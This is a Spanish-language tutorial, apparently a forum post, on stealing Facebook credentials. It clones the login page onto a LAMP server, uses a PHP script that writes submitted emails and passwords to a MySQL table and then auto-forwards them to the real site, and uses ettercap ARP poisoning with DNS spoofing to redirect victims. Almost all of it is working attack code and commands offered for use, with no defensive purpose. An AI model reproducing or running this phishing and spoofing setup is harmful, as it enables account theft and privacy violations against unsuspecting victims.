Vamos a crear un servidor LAMP, y falsear facebook (mientras la victima piensa que entra en facebook, en realidad entra en nuestro servidor apache) para que al ingresar las contraseñas queden grabadas en nuestra base de datos, tambien deberemos hacer un dns_spoof a la victima...
Sirve para cualquier web cambiando un par de parametros pero el ejemplo lo he hecho con facebook
1- Instalamos la base de datos:
sudo aptitude install php5 mysql-server libapache2-mod-auth-mysql php5-mysql phpmyadmin
2- Descargamos el phpMyAdmin lo descomprimimos y lo metemos en /var/www/
3- Configuramos la base de datos y creamos una base de datos llamada XXX con una tabla Passwords con tres campos que seran id, user, pass
Bien ya tenemos la base de datos configurada, ahora un poco de php.
4- Copiamos el index de facebook y lo metemos en nuestro servidor web, /var/www/index.php
En este archivo debemos cambiar el action del <form id="login_form">
Citar
<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="NLumB" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="es_ES" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Correo electrónico</label></td><td class="html7magic"><label for="pass">Contraseña</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" />.................
debemos poner este php como action dejando igual todo lo demas--> form method="POST" action="insert_into.php"
5-ponemos este insert_into.php en /var/www/
Citar
<?php
$conn=mysql_connect("127.0.0.1","userBaseDeDatos","passBaseDeDatos");
$err_db=mysql_select_db("XXX");
$usuario=$_POST['email'];
$contra=$_POST['pass'];
$sql="insert into Passwords (user, pass) values ('$usuario', '$contra')";
if ( ! $resul=mysql_query($sql,$conn))
{
exit;
}
mysql_close();
//header ("Location: https://login.facebook.com/login.php?login_attempt=1");
?>
<html><head></head><body>
<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)">
<input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є">
<input type="hidden" name="lsd" value="LzdnF" autocomplete="off">
<input type="hidden" id="locale" name="locale" value="es_ES" autocomplete="off">
<?php
echo '<input type="hidden" class="inputtext" name="email" id="email" tabindex="1" value='.$usuario.'>';
echo '<input type="hidden" class="inputtext" name="pass" id="pass" tabindex="2" value='.$contra.'>';
?>
<!--<input value="Entrar" tabindex="4" type="submit"> -->
<input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є">
<input type="hidden" id="lsd" name="lsd" value="LzdnF" autocomplete="off">
<script language="javascript" type="text/javascript">
<!--
document.getElementById('login_form').submit();
//-->
</script>
</form>
</body></html>
Bueno, por fin lo tenemos todo preparado, solo nos falta la ayuda de ettercap.
6-Configuramos el /usr/share/ettercap/etter.dns y ejecutamos ettercap
Citar
sudo echo *.facebook.* A TuIP > /usr/share/ettercap/etter.dns
sudo echo www.facebook.* A TuIP >> /usr/share/ettercap/etter.dns
sudo ettercap -T -q -i eth0 -M arp:remote -P dns_spoof // /ipRouter/